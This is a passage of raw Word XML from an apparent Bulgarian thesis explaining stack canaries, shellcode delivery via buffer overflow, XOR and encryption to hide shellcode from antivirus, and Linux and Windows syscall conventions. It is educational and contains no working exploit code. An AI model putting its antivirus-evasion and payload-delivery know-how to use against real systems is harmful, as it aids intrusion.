        <w:t>ROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> атака</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Ref2190146"/>
      <w:bookmarkStart w:id="31" w:name="_Toc3540757"/>
      <w:r w:rsidRPr="00112660">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>Канарчета</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Защитата е кръстена на практиката миньорите да гледат канарчета в мините, като метод за предизвестяване на хората вътре, че въздухът е станал отровен. Канарчетата умират преди обстановката да стане опасна за хората. </w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="_Ref2190500"/>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="17"/>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Контролът на програмата е застрашен само при връщане на функция. Дори и след преливане, програмата може да продължи изпълнението си, макар и с грешни данни, и да предприеме действия за потенциално възстановяване, което прави тази защита. Канарчето представлява един или повече байтове поставени между локалните променливи и запазените rbp и rip в кадъра на функциите. Тяхната стойност се генерира по алгоритъм или се избира по (псевдо) случаен начин в началото на функцията, наречен “пролог”. Преди </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> инструкция се прави проверка за валидност, наречена “епилог”, и евентуално разминаване означава, че буфер е прелял и има възможност кадъра да е подправен. Тогава се предприема действие за изход на програмата. Защитата се прилага от компилаторите на функции, които са определени като уязвими.                       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+---------------+&lt;-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 3    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 2    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rip   |   rbp  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------ |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rbp   |--------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    canary     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  buffer[end]  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       .       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       .       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       .       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  buffer[end]  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 2     |   rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Кадър с канарче</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_gxyxbdz9j2a3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="34" w:name="_Toc3540758"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="00567E8F">
        <w:t>Обобщение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Има много защити от buffer overflow, които в един идеален свят напълно елиминират атаки. На практика обаче, самите защити имат проблеми или изникват странични бъгове, които излагат информация, която позволява пълното заобикаляне на защитата с модифициран подход, както при ROP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>В съвременния свят слабостите се атакуват в комбинация с други, които позволяват експлоатирането на първите, както в известния stuxnet</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="18"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005D2D2A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:hanging="270"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_kpy4m8372q8k" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="36" w:name="_Toc3540759"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Втора глава</w:t>
      </w:r>
      <w:r w:rsidR="005D2D2A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и неговото приложение за атаки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Шелкод (shellcode) е изпълним код, който се използва като товар при експлоатация на софтуерна слабост</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:bookmarkStart w:id="37" w:name="_Ref2193869"/>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="19"/>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Оригинално шелкод е стартирал команден интерпретатор (shell), от където взима името си. В днешно време той прави много повече с различни цели и ефекти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Тъй като шелкодът обикновено достига целта си през технологична слабост, обикновено има големи ограничения за размер и формат. Затова той често се пише на </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">асемблерен </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">език </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>assembly</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Ако имаме достъп до цялата машина обаче, бихме могли да използваме езици като python и C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Една от често използваните слабости за доставяне на шелкод е точно преливане на буфер. В примера overflow_example.c, ако нямаше защитата канарче, изпълнението щеше да продължи нормално и ако масивът прелее, при изпълнение на инструкция </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> програмата щеше да върне контрол на току-що презаписан адрес. Ако атакуващият постави адреса на код, който отново е бил току-що записан, той може да го изпълни. Точно този код се нарича “payload” или “shellcode” - целта на дипломната работа. Определянето на адреса, на който ще бъде зареден този шелкод, е извън обхвата на дипломната работа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_28z78vldqi3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="39" w:name="_Toc3540760"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Изисквания</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> към шелкод</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Ако се върнем към кода в overflow_example.c, виждаме, че </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> има размер 25 байта и в него без проверки се копира информация до достигане на терминираща нула (чрез </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>strcpy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>). Затова, за да бъде копиран целият, той не трябва да съдържа нулеви байтове, което е едно от най-честите ограничения. Подобно ограничение за стойности е новият ред (\n или \r\n) Използват се много трикове, за да се заобиколят различните ограничения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Също така много от функционалностите на един шелкод се дублират, което помага на антивирусните системи да прилагат алгоритми за разпознаването им. Те следят програми и мрежови трафик за подозрителни комбинации, каквито са обикновено тези в шелкод. За да бъде прикрит, той може да бъде кодиран с различни методи, например xor и криптиране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XOR е много лесен за реализация, но лесно се прихваща от антивирусни, защото не променя особено модела на шелкод, само заменя стойностите. Много по-сигурен метод е криптирането. Ако се използва модерен алгоритъм и добър ключ, неговото разбиване е практически невъзможно, а предаваната информация не подлежи на абсолютно никакъв анализ. Недостатъкът обаче е, че реализацията му е много трудна, особено ръчно на </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Изискванията са много и са различни за различните атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_uiftgqoxoxg5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="41" w:name="_Toc3540761"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Разлики </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>между</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> операционните системи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Windows и Linux са главните конкуренти в настолните</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="20"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и сървърните конфигурации. Дизайнът на техните ядра (kernel), комуникацията с потребителското пространство, споделени библиотеки и още много компоненти нямат нищо общо. Могат да се сравняват всевъзможни детайли, но основните разлики между тях са форматът на изпълнимите файлове и начинът на извикване на системна функция. Това пречи на изпълним файл, предназначен за едната система, да бъде изпълнен на друга. Примерите са за x86_64, но конвенциите са различни за отделните архитектури. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_q60q0rmbw3yt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="43" w:name="_Toc3540762"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Използваният файлов формат е ELF (Executable and Linkable Format), а конвенцията за системни функции е отново System V. Разположението на паметта</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> е </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t xml:space="preserve">описана в т. </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:instrText xml:space="preserve"> REF _Ref2190345 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>1.1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> тук следват спецификите за интерфейса между програмата и ядрото.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Параметрите за ядрото се подават под ред в регистри rdi, rsi, rdx, r10, r8, r9, след което на стека (в 1.1.3), в обратен ред. Rax и rdx, за 128 битови стойности се използва за връщане на стойности. За извикване на системна функция се използва същият метод, с малки разлики</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="21"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. Основната е, че вместо инструкция </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> се използва </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за предаване на контрола на ядрото. Тъй като syscall не приема параметри, номерът на функцията се поставя в rax. Таблица с номерата и параметрите на всяка функция е достъпна от различни източници</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="22"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> или man syscalls. За x86 конвенцията е подобна, но системна функция се вика с </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>int 0x80</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. Политиката на Линус Торвалдс “We do not break </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>user space”</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="23"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, дава абсолютна гаранция, че системна функция няма да се промени с промяна на версията на ядрото. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_xqcu2gyhdem2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="45" w:name="_Toc3540763"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00CF6AEC" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>Използваният файлов фо</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>рм</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>ат е PE (Portable Executable), а конвенцията е специфична за платформата</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="24"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>. Параметри се подават в rcx, rdx, r8, и r9, след което отново на стека в обратен ред. Стойности отново се връщат в rax, а по-големи от 64 бита типове - в xmm0. Системните функции са абсолютно различни. Дори не са документирани в официалната документация. Това е защото в Windows се очаква разработчиците да използват стандартната библиотека за текущата версия на операционната система, която да се занимава със специфики като системни функции. Много от функционалностите в библиотеките никога не стигат до ядрото. Това позволява на Microsoft по-голяма свобода при разработката на ядрото си. По-старата библиотека се казва win32</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="25"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>, а новата е Universal Windows Platform (UWP)</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="26"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
